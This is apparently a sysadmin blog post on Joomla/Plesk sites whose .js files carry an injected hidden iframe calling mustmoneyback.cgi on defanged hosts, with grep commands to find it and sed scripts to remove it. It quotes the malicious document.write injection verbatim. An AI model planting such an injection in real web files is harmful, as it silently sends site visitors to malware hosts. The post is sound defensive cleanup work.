
New Joomla infections (?) mustmoneyback.cgi

Today, while looking at some systems, I noticed a new pattern in some .js files. Multiple files were infected with the following code:

;document.write('<iframe src="hxxp://hfxgr.sellClassics.com/mustmoneyback.cgi?3" align="center" height="5" width="5"></iframe>');

;document.write('<iframe src="hxxp://lenslifcs.mynumber.org/mustmoneyback.cgi?3" align="center" height="5" width="5"></iframe>');

Other domains were also found with calls to the same .cgi file. An easy way to look for infections on Plesk systems is the following:

find /var/www/vhosts/ -type f -name '*.js' -print0 | xargs -0 egrep -iw "(km0ae9gr6m|mustmoneyback)"

After locating the infections, one can clean up the files using sed and the command:

grep -irl mustmoneyback /var/www/vhosts/domain/* | xargs sed -ni '1h;1!H;${x;s/\;document.*iframe.*//;p}'

or,

grep -ilr 'mustmoneyback' . | while IFS= read -r val; do echo "$val"; echo "$val" >> /tmp/jsinfected.txt; sed -ni '1h;1!H;${x;s/\;document.*iframe.*//;p}' "$val"; done

keeping a record of which files were infected under /tmp/jsinfected.txt.
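The one-liners above slurp each whole file into sed's pattern space (the `1h;1!H;$...` idiom), and in GNU sed `.*` then also matches across newlines, so `s/\;document.*iframe.*//` removes everything from the first `;document` to the end of the file. That is fine when the injection was appended as the last line, which is the common case, but it would also wipe legitimate code that follows it. The script below is an added example, not a command from the original post: it keeps the post's find/grep approach for locating infected .js files, records them in a log, keeps a backup of each file before touching it, and deletes only lines that are wholly the injected `document.write` call, so code before and after the injection survives. The sample vhost tree it builds is constructed data for the demonstration; the function names, the `.infected.bak` suffix and the assumption that each injection occupies a whole line starting with `;document.write(` are mine, not the post's.

```shell
#!/bin/sh
# Added example (not the original post's commands): find .js files carrying the
# mustmoneyback.cgi iframe injection, record them, back each file up, and delete
# only the injected line(s) instead of slurping the whole file into sed.
# Assumption (not stated in the post): each injection is a whole line that starts
# with ";document.write(" and carries an <iframe> pointing at mustmoneyback.cgi.

# clean_injected_js DIR LOGFILE
#   Cleans every infected .js under DIR, writes one cleaned path per line to
#   LOGFILE (truncated first), and prints each cleaned path.
clean_injected_js() {
    dir=$1
    log=$2
    : > "$log"
    # -print0/-0 keeps paths with spaces intact; grep -l lists each file once.
    find "$dir" -type f -name '*.js' -print0 \
        | xargs -0 grep -l 'mustmoneyback' 2>/dev/null \
        | while IFS= read -r f; do
            cp -p "$f" "$f.infected.bak"   # keep the evidence before modifying
            # Line-anchored delete: only lines that are entirely the injected call.
            sed -i '/^;document\.write(.*<iframe[^>]*mustmoneyback\.cgi[^>]*>.*<\/iframe>.*);$/d' "$f"
            printf '%s\n' "$f" >> "$log"
            printf 'cleaned %s\n' "$f"
        done
}

# make_sample_tree DIR
#   Builds a small, constructed vhost-like tree: one infected .js (with real code
#   on both sides of the injected line, and a space in its path) and one clean .js.
#   The injected line is the defanged (hxxp) form quoted in the post.
make_sample_tree() {
    dir=$1
    mkdir -p "$dir/site a/js" "$dir/siteb/js"
    {
        printf 'function init(){ return 1; }\n'
        printf ";document.write('<iframe src=\"hxxp://hfxgr.sellClassics.com/mustmoneyback.cgi?3\" align=\"center\" height=\"5\" width=\"5\"></iframe>');\n"
        printf 'var after = "still here";\n'
    } > "$dir/site a/js/app.js"
    printf 'var clean = true;\n' > "$dir/siteb/js/lib.js"
}

# Stand-alone run: build the sample tree in a temp dir, clean it, show the record.
if [ "${DEMO_RUN:-1}" = 1 ] && [ -z "$DEMO_SKIP" ]; then
    work=$(mktemp -d)
    make_sample_tree "$work"
    clean_injected_js "$work" "$work/jsinfected.txt"
    printf -- '--- record:\n'; cat "$work/jsinfected.txt"
    printf -- '--- cleaned file:\n'; cat "$work/site a/js/app.js"
    rm -rf "$work"
fi
```

Run it on a Plesk box as `DEMO_SKIP=1 . ./clean.sh; clean_injected_js /var/www/vhosts /tmp/jsinfected.txt` after checking the sed pattern against one of your own infected files first; the `.infected.bak` copies let you diff what was removed and restore a file if the pattern was too broad.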
